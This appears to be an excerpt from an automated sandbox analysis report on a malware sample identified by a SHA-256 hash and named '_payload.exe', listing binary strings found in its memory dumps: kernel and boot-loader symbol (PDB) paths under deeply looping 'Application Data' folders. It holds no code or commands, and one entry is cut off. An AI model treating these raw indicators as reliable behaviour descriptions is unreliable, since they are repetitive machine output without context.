              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\A; source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2370453597.000000000388E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366626954.0000000003839000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369012097.0000000003839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ache\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316699687.0000000003810000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306879386.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314855874.0000000003806000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307257560.00000000037F7000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2308025435.0000000003803000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316052889.000000000380D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298330400.00000000037EF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.ppvwV source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315059111.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b, source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316249457.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306348471.0000000003347000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\te\mp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368905489.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2386123176.0000000000B23000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Logs\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408906620712704.txt\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*M source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C90000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367136260.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000331B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368122855.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361063125.000000000331B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2037446933.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Gc source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316633831.000000000395D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314963868.0000000003950000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316109364.000000000395A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314653770.000000000394E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359865944.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361850146.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\: source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353832982.00000000038FB000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314907836.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315942860.00000000038F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367136260.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000331B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368122855.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361063125.000000000331B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297833112.0000000003309000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\b source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\N,tAM source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ Z0@g source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ult\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\j source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\o source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
